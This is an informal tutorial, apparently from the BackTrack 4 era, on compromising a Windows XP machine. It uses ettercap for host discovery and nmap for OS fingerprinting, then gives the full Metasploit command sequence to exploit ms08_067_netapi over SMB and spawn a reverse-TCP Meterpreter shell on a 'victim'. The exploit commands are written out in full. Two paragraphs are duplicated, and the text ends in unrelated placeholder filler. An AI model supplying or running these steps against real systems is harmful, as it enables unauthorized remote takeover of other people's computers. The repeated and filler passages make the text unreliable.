How to get a meterpreter shell.
Now in this tutorial I am using backtrack 4 r2 and going to be showing you how to get a meterpreter shell.Here are the basics of gaining any type of shell.
How do we check for live hosts?
First we are going to be scanning to check what ports are open and OS (Operating System) fingerprinting. But before we do that your probably wondering how do we check if people are on the network and if they are what are their IP addresses. Well What I do and believe it is the easiest way by far is running ettercap. So lets run ettercap open up a console and type in.ettercap -G and ettercap will open up.
ettercap -G
then ettercap opens up.
Now you can use hotkeys like I do make you look 1337 in front of people but for now we'll just use the mouse SNIFF > UNIFIED SNIFF and choose you interface mine is going to be vmnet1 Beacuse my Windows xp installation is in VmWare. Yours might be wlan0 if your on a wireless network or eth0 if connected LAN.
Now let's scan HOSTS > SCAN FOR HOSTS I recommend you scan a couple times then HOSTS > HOST LIST and you get your list.
How do we scan for ports and know what OS he's using?
Okay pick an IP address from the list and remember it. Now open up a new console to scan the victim with namp. Now nmap has a lot of options so it's really easy to get confused.but I don't want to talk too much about it just yet. So now back to our console type in nmap -O [your victims IP] . The -O options is Operating system detection. Then you should get something like this. Now just by looking at this we know its a Windows XP with our favorite port open 445 SMB.
nmap -O 192.168.0.128
Okay pick an IP address from the list and remember it. Now open up a new console to scan the victim with namp. Now nmap has a lot of options so it's really easy to get confused.but I don't want to talk too much about it just yet. So now back to our console type in nmap -O [your victims IP] . The -O options is Operating system detection. Then you should get something like this. Now just by looking at this we know its a Windows XP with our favorite port open 445 SMB.
nmap -O 192.168.0.128
Now lets open up METASPLOIT .
cd /pentest/exploits/framework3/
./msfconsole
Now always run svnup before starting your attack to update metasploit. You also need to know you IP address if you don't know how type in
ifconfig.
Now we now the port number we want to attack it was 445 smb let's use one of the best exploits out right now ms08_067_netapi will never fail you on a XP system trust me on this. Now that we know what exploit we are going to use lets set our payload now the payload is the type of shell you want to spawn could be a vnc cmd or a meterpreter. In this tutorial we are going for a reverse tcp meterpreter witch means he will connect to you.
Now we now the port number we want to attack it was 445 smb let's use one of the best exploits out right now ms08_067_netapi will never fail you on a XP system trust me on this. Now that we know what exploit we are going to use lets set our payload now the payload is the type of shell you want to spawn could be a vnc cmd or a meterpreter. In this tutorial we are going for a reverse tcp meterpreter witch means he will connect to you.
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.0.128 [VIMTIM IP]
set lhost 192.168.0.1 [OUR IP]
Now lets run it. If everything goes well then you should get something like what i got.
exploit
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.